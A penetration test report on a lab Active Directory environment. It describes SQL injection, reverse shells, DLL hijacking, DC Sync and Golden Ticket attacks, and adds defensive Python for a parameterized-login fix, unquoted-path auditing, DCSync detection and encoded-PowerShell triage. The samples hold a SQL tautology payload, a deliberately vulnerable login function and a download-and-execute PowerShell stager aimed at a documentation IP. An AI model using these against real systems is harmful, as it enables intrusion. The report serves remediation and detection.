AD.LAB Internal and Web Application Penetration Test Report
Engagement Dates: February 3, 2025 – February 6, 2025
Report Date: February 9, 2025
Prepared for: AD.LAB Security Team
Prepared by: Andrew Lobenstein
1. Executive Summary
Purpose and Objectives
The AD.LAB penetration test was conducted to evaluate the security posture of both external web applications and the internal Active Directory (AD) environment. Our primary objectives were to identify critical vulnerabilities, assess lateral movement and privilege escalation vectors, and provide actionable recommendations to remediate these issues.
Key Highlights
- SQL Injection in Web Login Forms: Both WEB01 and WEB02 were vulnerable to SQL injection, enabling attackers to bypass authentication, write files (e.g., a web shell), and trigger system-level commands (via xp_cmdshell) to download utilities and spawn reverse shells.
- Unquoted Service Path Vulnerability: A service (BetaService) was configured with an unquoted executable path containing spaces. A malicious replacement binary was uploaded and executed with SYSTEM privileges.
- Insecure WebDAV and Email Relay Abuse: The WsgiDAV server (MAIL01) was misconfigured to allow anonymous read–write access. This enabled file uploads (including a Windows Library file and a PowerShell shortcut with a reverse shell payload) and the abuse of SMTP relay to stage remote code execution.
- Service File Replacement / DLL Hijacking: On DEV01 and ADMIN01, improper file permissions allowed the attacker to replace legitimate executables and DLLs, causing malicious payloads to run on system reboot or service restart.
- Abuse of SeImpersonatePrivilege: The nt service\mssqlserver account had SeImpersonatePrivilege enabled, which was exploited using the SigmaPotato tool to spawn a SYSTEM-level reverse shell on ADMIN04.
- Unrestricted DCOM Remote Command Execution: Insecure DCOM configurations allowed remote instantiation of COM objects. An instance of MMC20.Application was created on ADMIN02 to execute encoded PowerShell commands remotely.
- Credential Exposure and Misconfigured Document Storage: Sensitive credentials were exposed through improperly secured environment variables and Office documents. Extracted Office document hashes were cracked to recover credentials used for further exploitation.
- Weak/Misconfigured File and Service Permissions: Several systems allowed unauthorized replacement of service executables or missing files (e.g., NewService.dll), enabling remote code execution upon service restart.
- DC Sync Abuse and Golden Ticket Generation: DC Sync was used to dump high-privilege account hashes. The extracted AES key was then used to forge a Golden Ticket, providing persistent domain access.
- Misconfigured Remote Management and RDP Settings: Registry and firewall settings were modified to enable RDP and WMI access remotely, even on systems where these features were originally disabled.
- Excessive Permissions on SMB Shares: Overly permissive SMB shares (such as DomainAdminsShare on FILES01) allowed an attacker to access sensitive data.
- Scheduled Task and Remote Service Abuse: The attacker created scheduled tasks and new services that executed reverse shell payloads, furthering lateral movement and privilege escalation.
- Mimikatz for Privilege Escalation and Credential Dumping: Mimikatz was used to extract password hashes and Kerberos keys from LSASS, facilitating additional attacks.
- Golden Ticket Attacks: Weak key management allowed the creation of forged Kerberos tickets, enabling indefinite authentication as a high-privilege account.
Overall Risk and Impact
The vulnerabilities identified pose a High/Critical risk. An attacker could leverage these weaknesses to gain full domain control, exfiltrate sensitive data, deploy ransomware, and cause significant reputational and operational damage.
2. Scope and Engagement Details
In-Scope Systems and Services
The assessment included the following systems:
- WEB01: Public-facing web server (10.10.14.20)
- WEB02: Authenticated web application (web02.ad.lab)
- DMZ01: Internal Windows host for lateral movement
- MAIL01: SMTP mail server
- DEV01, ADMIN01, ADMIN02, ADMIN03, ADMIN04: Internal Windows endpoints
- DC01: Primary Domain Controller
- FILES01: File server hosting SMB shares
Out-of-Scope Items
Systems or networks not explicitly listed above were excluded. The assessment was limited to the approved testing window and did not involve any destructive or denial-of-service testing.
Constraints and Assumptions
Testing was conducted from February 3 to February 6, 2025. Authorization was provided for simulated Domain Administrator actions under strict engagement rules.
3. Methodology
Our testing approach was based on industry standards (PTES and NIST SP 800-115) and comprised the following phases:
- Reconnaissance & Information Gathering: We performed active and passive scanning (using tools such as Nmap, WhatWeb, and DNS queries) to identify and map in-scope systems and services.
- Threat Modeling & Vulnerability Identification: Vulnerability assessments and manual testing uncovered misconfigurations and code injection flaws, particularly in web login forms and Active Directory configurations.
- Exploitation: We simulated attacks by exploiting SQL injection vulnerabilities to bypass authentication, write files (web shells), and trigger system-level commands. Additionally, we exploited misconfigured services, weak file permissions, and insecure remote management settings.
- Post-Exploitation & Lateral Movement: Using techniques such as DC Sync, ticket forgery (both Silver and Golden Tickets), and abuse of privileges (e.g., SeImpersonatePrivilege, DCOM), we demonstrated how an attacker could move laterally and escalate privileges across the network.
- Reporting & Remediation: All findings were documented at a high level, with remediation recommendations provided to reduce risk and strengthen the overall security posture.
4. Risk Assessment and Overall Findings
Our high-level risk matrix was based on both technical severity and potential business impact. Key findings include:
Vulnerability Area | Severity | Impact
SQL Injection in Web Login Forms | Critical | Remote Code Execution and Credential Exposure
Unquoted Service Paths | High | Local Privilege Escalation to SYSTEM
Insecure WebDAV & Email Relay | Medium | Code Staging and Phishing Attacks
Service File Replacement / DLL Hijacking | Critical | Remote Code Execution on Affected Hosts
Abuse of SeImpersonatePrivilege | High | Escalation to SYSTEM
Unrestricted DCOM Execution | High | Remote Command Execution
Credential Exposure & Misconfigured Document Storage | Medium | Exposure of Sensitive Data
Weak File/Service Permissions | High | Service Replacement and Remote Code Execution
DC Sync Abuse & Ticket Forgery | Critical | Full Domain Compromise
Misconfigured Remote Management and RDP Settings | High | Unauthorized Remote Access
Excessive SMB Share Permissions | Medium | Data Exposure
Scheduled Task & Remote Service Abuse | High | Arbitrary Code Execution
Mimikatz-Based Credential Dumping | Critical | Further Lateral Movement and Ticket Forgery
Golden Ticket Attacks | Critical | Indefinite AD Access
The overall risk to the AD.LAB environment is assessed as High/Critical given the possibility for an attacker to gain full Domain Administrator privileges.
5. Detailed Technical Findings
The following sections provide a high-level explanation of the vulnerabilities identified, the attacks performed, and their overall impact. (Detailed commands and tool outputs are provided separately.)
- SQL Injection in Web Login Forms (WEB01 & WEB02): The login forms were not properly sanitized, allowing:
- Injection of SQL payloads to bypass authentication.
- File writing (e.g., planting a web shell such as shell.php) for remote code execution.
- Triggering of system-level commands via xp_cmdshell to download utilities (e.g., nc.exe) and spawn reverse shells.
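The root cause of the WEB01/WEB02 finding is string concatenation of user input into the login query. The following is an added illustration, not code from the report or from the AD.LAB applications: it places a minimal vulnerable login beside its parameterized replacement and shows that the same tautology input authenticates against the first and is rejected by the second. The user table, the credential values and the sqlite3 backend are all constructed for the example (the real hosts ran a database exposing xp_cmdshell, but the fix is identical).

```python
import sqlite3

# Constructed stand-in for the WEB01/WEB02 login backend. sqlite3 is used so
# the example runs offline; the injection and the remediation do not depend
# on the engine.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """The flaw in the finding: untrusted input is spliced into the SQL text,
    so the input can change the structure of the query, not just its values."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0

def login_parameterized(conn, username, password):
    """Remediation: the query shape is fixed at the placeholders and the driver
    binds the values separately, so quote characters in the input stay data."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0

# Constructed tautology input of the kind the finding describes. Spliced into
# the vulnerable query it turns the WHERE clause into "... OR '1'='1'", which
# is always true; bound as a parameter it is simply a wrong password.
BYPASS_PASSWORD = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("vulnerable", login_vulnerable),
                     ("parameterized", login_parameterized)):
        print(name,
              "legit:", fn(conn, "alice", "correct horse battery staple"),
              "bypass:", fn(conn, "nobody", BYPASS_PASSWORD))
```

Parameterization removes the injection; the follow-on impact in the finding (file writes and xp_cmdshell) is bounded separately by running the application under a low-privilege database login rather than sysadmin and by leaving the xp_cmdshell server option disabled through sp_configure.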
- Unquoted Service Path Vulnerability (BetaService): A service was configured with an unquoted executable path that contained spaces. An attacker replaced the legitimate binary with a malicious payload (Beta.exe), which executed with SYSTEM privileges upon service restart.
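An unquoted ImagePath is exploitable because the service control manager resolves the path by trying each space-delimited prefix (with .exe appended) before the intended binary. The audit helper below is an added example, not a tool from the engagement: given an ImagePath string it lists the intermediate locations Windows would try, which are the directories whose write permissions need checking, and produces the quoted form that remediates the issue. The report does not give BetaService's real path, so the sample paths are constructed.

```python
import re

# Executable part of a service ImagePath (up to the first ".exe") and any
# arguments that follow it.
_EXE_AND_ARGS = re.compile(r"(?i)^(.*?\.exe)(\s.*)?$")

def unquoted_path_candidates(image_path):
    """Return the executable paths Windows would try, in order, before reaching
    the intended binary when the ImagePath is unquoted and contains spaces.
    Each returned path is a location whose parent directory must not be
    writable by unprivileged users; an empty list means the path is not
    affected (quoted, or no spaces in the executable path)."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    m = _EXE_AND_ARGS.match(path)
    exe = m.group(1) if m else path
    if " " not in exe:
        return []
    parts = exe.split(" ")
    # C:\Program Files\Beta Service\Beta.exe is tried as C:\Program.exe,
    # then C:\Program Files\Beta.exe, then the real file.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def quote_image_path(image_path):
    """Remediated ImagePath: executable wrapped in double quotes, arguments kept."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    m = _EXE_AND_ARGS.match(path)
    if not m or " " not in m.group(1):
        return path
    return '"%s"%s' % (m.group(1), m.group(2) or "")

# Constructed sample ImagePath values (the BetaService path is invented).
SAMPLE_IMAGE_PATHS = [
    r"C:\Program Files\Beta Service\Beta.exe -svc",
    r'"C:\Program Files\Beta Service\Beta.exe" -svc',
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for p in SAMPLE_IMAGE_PATHS:
        cands = unquoted_path_candidates(p)
        print("NEEDS QUOTING" if cands else "ok", p)
        for c in cands:
            print("   would try:", c)
        if cands:
            print("   fix ->", quote_image_path(p))
```

On a live host the ImagePath values come from HKLM\SYSTEM\CurrentControlSet\Services\<name>; the quoted form produced here is what to set with sc config <name> binPath= (with the inner quotes escaped), after confirming that the directories in the candidate list are not writable by standard users.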
- Insecure WebDAV Configuration and Email Relay Abuse: The WsgiDAV server (MAIL01) allowed anonymous read–write access. This enabled:
- Uploading of files such as a Windows Library file and a PowerShell shortcut (with a reverse shell payload) to the WebDAV share.
- Using SMTP relay (via a tool like swaks) to send emails with these malicious attachments to stage remote code execution.
- Service File Replacement / DLL Hijacking: Improper file permissions on DEV01 and ADMIN01 allowed the replacement of legitimate service executables or DLLs. The attacker:
- Replaced a service’s executable with a malicious payload that executed upon reboot or service restart.
- Downloaded and placed a missing DLL (NewService.dll) into the service directory, then started the service to spawn a reverse shell as SYSTEM.
- Abuse of SeImpersonatePrivilege: The nt service\mssqlserver account had the SeImpersonatePrivilege enabled. This was exploited using SigmaPotato to impersonate a SYSTEM-level token and spawn a reverse shell on WEB02.
- Unrestricted DCOM Remote Command Execution: Insecure DCOM settings allowed remote instantiation of COM objects. An attacker created an instance of the MMC20.Application COM object on ADMIN02 and used its shell-execution method to run base64-encoded PowerShell commands.
- Credential Exposure and Misconfigured Document Storage: Sensitive credentials were inadvertently exposed (e.g., in environment variables and Office documents). Office document hashes were extracted and cracked (via hashcat) to recover credentials, which were then used to create scheduled tasks and new services that furthered lateral movement.
- Weak or Misconfigured File/Service Permissions Allowing Replacement: Several systems (DEV01, ADMIN02, ADMIN01) had service directories with insufficient protections, allowing:
- Replacement of legitimate executables with malicious payloads.
- Insertion of missing DLLs that triggered remote code execution when the service restarted.
- DC Sync Abuse and Golden Ticket Generation: The domain controller (DC01) allowed replication requests (DC Sync) and had exposed AES keys. Using mimikatz, high-privilege account hashes (e.g., for Administrator and krbtgt) were dumped, and a Golden Ticket was forged using a custom tool, enabling persistent AD access.
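A DC Sync request is a directory replication request, so on the domain controller it leaves a Security event 4662 in which the requesting account exercises the replication extended rights on the domain object. The detection logic below is an added example, not part of the engagement evidence: it scans event records for those rights and raises an alert when the requester is not in the expected set of replicators (domain controller computer accounts and any directory synchronization service accounts). The right GUIDs are the AD schema control access rights; the event records and account names are constructed and simplified.

```python
import re

# Control access rights from the AD schema that a replication (DCSync)
# request exercises on the domain naming context.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
_GUID = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def find_dcsync(events, expected_replicators):
    """Return one alert per 4662 event in which an account outside the expected
    replicator set exercised a replication right."""
    expected = {a.upper() for a in expected_replicators}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()]
                  for g in _GUID.findall(ev.get("Properties", ""))
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights:
            continue
        account = ev.get("SubjectUserName", "")
        if account.upper() in expected:
            continue
        alerts.append({"account": account, "host": ev.get("Computer"), "rights": rights})
    return alerts

# Constructed, simplified records. Real 4662 events carry these GUIDs inside
# a longer Properties string; the field names follow the event schema.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.ad.lab", "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.ad.lab", "SubjectUserName": "jdoe",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.ad.lab", "SubjectUserName": "jdoe",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # unrelated object access
    {"EventID": 4624, "Computer": "DC01.ad.lab", "SubjectUserName": "jdoe", "Properties": ""},
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print("DCSync suspected:", alert)
```

The same three rights are what to audit on the domain object's ACL when remediating: only domain controllers and known synchronization accounts should hold them, and 4662 auditing for directory service access must be enabled on DC01 for the detection to have data.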
- Misconfigured Remote Management and RDP Settings: Although remote management features were initially disabled, registry settings and firewall rules were modified to enable RDP and WMI. This allowed an attacker to remotely execute commands (using WMIC and wmiexec) on critical systems such as DC01.
- Excessive Permissions on SMB Shares and Sensitive Data Exposure: An SMB share (e.g., DomainAdminsShare on FILES01) was misconfigured with overly permissive access, allowing an attacker (using a forged ticket) to enumerate and retrieve sensitive documents, including the domain flag.
- Scheduled Task and Remote Service Abuse for Code Execution: The environment allowed the creation of scheduled tasks and remote services without sufficient restrictions. This was abused to:
- Create scheduled tasks that executed encoded PowerShell commands to download and run reverse shell payloads.
- Create new services that, when started, executed malicious code and provided Domain Admin shells.
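Both persistence mechanisms in this finding generate a Windows event at creation time (Security 4698 for a scheduled task, System 7045 for a newly installed service), and the payloads described were base64-encoded PowerShell. The triage routine below is an added example rather than engagement tooling: it decodes any EncodedCommand argument found in the task or service command line (PowerShell expects base64 of UTF-16LE text) and reports simple indicator hits so an analyst sees the real script instead of an opaque blob. The event records, service names and the staging address (203.0.113.5, a documentation range) are constructed.

```python
import base64
import re

# Accepted spellings of the EncodedCommand switch (-e, -ec, -enc, -encodedcommand)
# followed by a base64 blob.
_ENC_ARG = re.compile(r"(?i)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")

# Substrings that should not appear in a task or service command line on a
# well-run host; each hit is reported as an indicator.
SUSPICIOUS = ("downloadstring", "iex", "invoke-expression", "net.sockets",
              "frombase64string", "-nop", "-w hidden", "bypass")

def encode_powershell(command):
    """What powershell -EncodedCommand expects: base64 of the UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(command_line):
    """Decoded script if the command line carries an encoded command, else None."""
    m = _ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events):
    """Inspect 4698 (task created) and 7045 (service installed) records, decode
    encoded PowerShell and collect indicator hits."""
    findings = []
    for ev in events:
        if ev.get("EventID") not in (4698, 7045):
            continue
        cmd = ev.get("Command", "")
        decoded = decode_encoded_command(cmd)
        haystack = (cmd + " " + (decoded or "")).lower()
        hits = [s for s in SUSPICIOUS if s in haystack]
        if decoded is not None:
            hits.insert(0, "encoded-command")
        if hits:
            findings.append({"event_id": ev["EventID"], "name": ev.get("Name"),
                             "account": ev.get("SubjectUserName"),
                             "decoded": decoded, "indicators": hits})
    return findings

# Constructed samples; the "Command" field stands in for the task action
# (4698) or the service ImagePath (7045).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
SAMPLE_EVENTS = [
    {"EventID": 4698, "Name": r"\Microsoft\Windows\Updater", "SubjectUserName": "svc_backup",
     "Command": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)},
    {"EventID": 7045, "Name": "ConstructedSvc", "SubjectUserName": "SYSTEM",
     "Command": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": 4698, "Name": r"\Backup\Nightly", "SubjectUserName": "svc_backup",
     "Command": r"C:\Scripts\backup.cmd"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["event_id"], f["name"], f["account"], f["indicators"])
        print("   decoded:", f["decoded"])
```

Beyond alerting, the preventive control for this finding is to restrict who may create tasks and services on member servers (local administrator membership and the service control manager's security descriptor) so that harvested credentials of ordinary accounts cannot be turned into code execution.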
- Mimikatz for Privilege Escalation and Credential Dumping: With administrative access, mimikatz was used to extract password hashes and Kerberos keys from LSASS, enabling further lateral movement and the forging of tickets.
- Golden Ticket Attacks Against the Domain: Weak key management enabled the forging of Kerberos tickets. Using the extracted AES256 key and the domain SID, a Golden Ticket was generated, providing indefinite access to the AD environment.
7. Conclusion
The AD.LAB penetration test uncovered a wide array of vulnerabilities that, if exploited by an adversary, could lead to full domain compromise. Our assessment demonstrated that the web applications were vulnerable to SQL injection, allowing remote code execution and credential harvesting. Additionally, misconfigurations in service paths, remote management, file permissions, and the use of powerful privileges (such as SeImpersonatePrivilege) enabled extensive lateral movement and privilege escalation.
Critical attacks, such as DC Sync abuse and Golden Ticket forgery, illustrate the potential for an attacker to achieve persistent and indefinite access to the AD environment. Immediate remediation, as outlined in this report, is essential to prevent exploitation and secure the AD.LAB network.
8. Appendices
Detailed technical evidence—including command logs, tool outputs, and screenshots—has been compiled in separate appendices:
- Appendix A: WEB01 Detailed Evidence
- Appendix B: WEB02 Detailed Evidence
- Appendix C: DMZ01 Evidence
- Appendix D: MAIL01 Evidence
- Appendix E: DEV01 Evidence
- Appendices F–I: ADMIN01–ADMIN04 Evidence
- Appendix J: DC01 Evidence
- Appendix K: FILES01 Evidence
9. References
- PTES (Penetration Testing Execution Standard)
- NIST SP 800-115: Technical Guide to Information Security Testing
- MITRE ATT&CK Framework – Active Directory Techniques
- OWASP Top 10 – Web Application Vulnerabilities
- Impacket Documentation and GitHub Repository
- Microsoft Security Guidance on Kerberos, WinRM, and SMB Hardening
- Mimikatz Documentation – DC Sync and Ticket Forgery Techniques